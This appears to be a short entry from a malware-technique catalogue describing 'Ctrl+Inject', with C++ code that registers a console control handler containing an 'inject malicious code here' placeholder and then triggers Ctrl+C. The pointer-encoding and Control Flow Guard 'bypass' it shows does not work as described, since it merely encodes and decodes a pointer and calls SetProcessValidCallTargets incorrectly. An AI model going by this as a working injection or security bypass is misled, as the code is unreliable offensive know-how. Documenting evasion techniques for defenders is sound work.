Windows C++ / Ctrl+Inject
| Author | Unprotect |
| Platform | Windows |
| Language | C++ |
| Technique | Ctrl+Inject |
Description:
This code first defines a callback function called ControlSignalHandler that will be used to inject malicious code. It then bypasses pointer encoding and control flow guard to ensure that the function can be called. Finally, it sets the callback function for control signal handlers using the SetConsoleCtrlHandler function and triggers a control signal by calling GenerateConsoleCtrlEvent.
Code
#include <Windows.h>
#include <cstdio>
// callback function for control signal handlers
BOOL WINAPI ControlSignalHandler(DWORD dwCtrlType)
{
// inject malicious code here
return TRUE;
}
int main()
{
// bypass pointer encoding
void* encodedPointer = EncodePointer((PVOID)ControlSignalHandler);
void* decodedPointer = DecodePointer(encodedPointer);
// bypass control flow guard
SetProcessValidCallTargets(GetCurrentProcess(), (UINT_PTR)decodedPointer, sizeof(void*));
// set callback function for control signal handlers
SetConsoleCtrlHandler((PHANDLER_ROUTINE)decodedPointer, TRUE);
// trigger control signal (Ctrl+C)
GenerateConsoleCtrlEvent(CTRL_C_EVENT, 0);
return 0;
}Created
December 29, 2022
Last Revised
April 22, 2024